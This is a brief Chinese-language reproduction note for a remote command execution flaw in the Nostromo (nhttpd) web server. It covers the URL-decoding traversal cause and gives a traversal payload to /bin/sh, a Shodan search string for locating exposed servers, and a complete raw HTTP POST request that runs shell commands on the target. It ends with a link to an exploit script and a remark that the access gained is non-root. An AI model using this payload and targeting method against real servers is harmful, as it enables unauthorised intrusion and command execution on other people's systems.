1、简介:
Nostromo web服务(又名nhttpd),这是一个开源的web服务,在Unix系统上非常流行,例如FreeBSD, OpenBSD等等
2、漏洞原理:
漏洞原因在于当时的web服务在对URL进行检查的时机是在URL被解码前,因此攻击者只需将/转换%2f就可绕过检查
payload:/..%2f..%2f..%2fbin/sh
3、搜索:
shodan:"Server: nostromo" fofa
4、复现
数据包:
POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 >Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en->US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 25 Connection: close Upgrade-Insecure-Requests: 1 echo echo ifconfig 2>&1
5、exp
https://github.com/sudohyak/exploit/blob/master/CVE-2019-16278/exploit.py
非root权限